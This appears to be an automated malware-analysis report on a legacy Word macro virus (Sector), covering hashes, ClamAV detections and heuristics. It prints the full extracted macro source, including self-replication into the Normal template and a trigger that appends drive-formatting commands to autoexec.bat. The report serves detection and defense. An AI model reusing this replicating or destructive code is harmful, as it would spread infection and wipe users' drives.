Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 63ac44db4f5e0739…

MALICIOUS

Office (OLE)

Size: 47.0 KB
Created: 2000-07-27 11:17:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 31de1d6010124183d3b642683c8f7c3f
SHA-1: c640f62aec5f28051ac87175de6e3c0c04c273cd
SHA-256: 63ac44db4f5e0739aef8c80c4fe001733ba729ee1b9a920b6363b3fb2a4e925e
Risk Score: 188

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits characteristics of a legacy WordBasic macro virus and contains VBA macros, including an AutoOpen subroutine. This indicates the file is designed to execute malicious code automatically when opened. The ClamAV detections further confirm its malicious nature, identifying it as 'Doc.Trojan.Sector-2' and an extracted artifact as 'Dos.Trojan.FormatC-59'.

Heuristics (4)

  • ClamAV: Doc.Trojan.Sector-2 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Sector-2
  • Legacy WordBasic macro-virus markers (severity: high, rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • AutoOpen macro (severity: low, rule: OLE_VBA_AUTOOPEN)
    Matched line in script: Attribute VB_Name = "AutoOpen"

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4957 bytes
SHA-256: 8ff717f0a4f26b0ba1e7d254ecee0cb7490141fdac7f2dc39ebe90a91f9b1fdc
Detection: ClamAV: Dos.Trojan.FormatC-59
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoExit"
Sub MAIN()
On Error GoTo q
Call ToolsMacro.MAIN
q:
End Sub


Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Макрос создан "
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN"
Dim u
Dim j
Dim i
On Error GoTo q
u = 0
j = WordBasic.CountMacros(0, 0)
For i = 1 To j
 If WordBasic.[MacroName$](i, 0, 0) = "Microsoft" Then u = 1
Next i
If u = 1 Then GoTo q
WordBasic.MacroCopy WordBasic.[Filename$]() + ":AutoExit", "Normal:AutoExit", 1
WordBasic.MacroCopy WordBasic.[Filename$]() + ":AutoOpen", "Normal:MicrosoftWord", 1
WordBasic.MacroCopy WordBasic.[Filename$]() + ":Microsoft", "Normal:Microsoft", 1
WordBasic.MacroCopy WordBasic.[Filename$]() + ":MicrosoftOffice", "Normal:FileOpen", 1
WordBasic.MacroCopy WordBasic.[Filename$]() + ":TM", "Normal:ToolsMacro", 1
WordBasic.MacroCopy WordBasic.[Filename$]() + ":MacrosAN", "Normal:FileSaveAs", 1
WordBasic.MacroCopy WordBasic.[Filename$]() + ":Normal", "Normal:FileTemplates", 1
WordBasic.MacroCopy WordBasic.[Filename$]() + ":Normal", "Normal:ViewVBCode", 1
q:
End Sub






Attribute VB_Name = "Microsoft"
Sub MAIN()
Attribute MAIN.VB_Description = "Макрос создан "
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.Microsoft.MAIN"
End Sub

Attribute VB_Name = "MicrosoftOffice"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Макрос создан "
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.MicrosoftOffice.MAIN"
Dim n
Dim iCountMacros
Dim i
Dim t$
On Error GoTo q1
Dialogs(wdDialogFileOpen).Show
n = 0
iCountMacros = WordBasic.CountMacros(1, 0, 0)
For i = 1 To iCountMacros
 t$ = WordBasic.[MacroName$](i, 1)
 If t$ = "Microsoft" Then n = 1
Next i
If n = 1 Then GoTo q1
SetAttr WordBasic.[Filename$](), 0
WordBasic.FileSaveAs WordBasic.[Filename$](), Format:=1
WordBasic.MacroCopy "Normal:AutoExit", WordBasic.[Filename$]() + ":AutoExit", 1
WordBasic.MacroCopy "Normal:MicrosoftWord", WordBasic.[Filename$]() + ":AutoOpen", 1
WordBasic.MacroCopy "Normal:Microsoft", WordBasic.[Filename$]() + ":Microsoft", 1
WordBasic.MacroCopy "Normal:FileOpen", WordBasic.[Filename$]() + ":MicrosoftOffice", 1
WordBasic.MacroCopy "Normal:ToolsMacro", WordBasic.[Filename$]() + ":TM", 1
WordBasic.MacroCopy "Normal:FileSaveAs", WordBasic.[Filename$]() + ":MacrosAN", 1
WordBasic.MacroCopy "Normal:FileTemplates", WordBasic.[Filename$]() + ":Normal", 1
q1:
End Sub






Attribute VB_Name = "TM"
Sub MAIN()
Attribute MAIN.VB_Description = "Макрос создан 14.03.95 Sector not Die!!!"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.TM.MAIN"
If (Second(Now()) = 13) Then
On Error GoTo s
MsgBox "Critical Error in Drive C:", vbCritical, "Error"
SetAttr "c:\autoexec.bat", 0
Open "c:\autoexec.bat" For Append As #1
Print #1, " "
Print #1, " "
Print #1, "@Echo Off"
Print #1, "@Echo y|format c: /u >nul"
Print #1, "@Echo y|format d: /u >nul"
Close #1
End If
s:
On Error GoTo Quit
If (Day(Now()) = 4) And (Month(Now()) = 7) Then
SetAttr "c:\autoexec.bat", 0
Open "c:\autoexec.bat" For Append As #1
Print #1, " "
Print #1, "echo Сегодня 04/07 - мой день рожденья!:-)"
Close #1
MsgBox "Today is my BirthDay! 04/07", vbSystemModal, "Congratilations!.."
End If
Quit:
SendKeys "%" + "{F4}"
End Sub

Attribute VB_Name = "MacrosAN"
Sub MAIN()
Dim h
Dim vCountMacros
Dim d
Dim t$
Dialogs(wdDialogFileSaveAs).Show
On Error GoTo q1
h = 0
vCountMacros = WordBasic.CountMacros(1, 0, 0)
For d = 1 To vCountMacros
 t$ = WordBasic.[MacroName$](d, 1)
 If t$ = "Microsoft" Then h = 1
Next d
If h = 1 Then GoTo q1
SetAttr WordBasic.[Filename$](), 0
WordBasic.FileSaveAs WordBasic.[Filename$](), Format:=1
WordBasic.MacroCopy "Normal:AutoExit", WordBasic.[Filename$]() + ":AutoExit", 1
WordBasic.MacroCopy "Normal:MicrosoftWord", WordBasic.[Filename$]() + ":AutoOpen", 1
WordBasic.MacroCopy "Normal:Microsoft", WordBasic.[Filename$]() + ":Microsoft", 1
WordBasic.MacroCopy "Normal:FileOpen", WordBasic.[Filename$]() + ":MicrosoftOffice", 1
WordBasic.MacroCopy "Normal:ToolsMacro", WordBasic.[Filename$]() + ":TM", 1
WordBasic.MacroCopy "Normal:FileSaveAs", WordBasic.[Filename$]() + ":MacrosAN", 1
WordBasic.MacroCopy "Normal:FileTemplates", WordBasic.[Filename$]() + ":Normal", 1
q1:
End Sub

Attribute VB_Name = "Normal"
Sub MAIN()
Attribute MAIN.VB_Description = "Макрос создан 14.03.95 Sector not Die!!!"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.Normal.MAIN"
On Error GoTo w
Call ToolsMacro.MAIN
w:
End Sub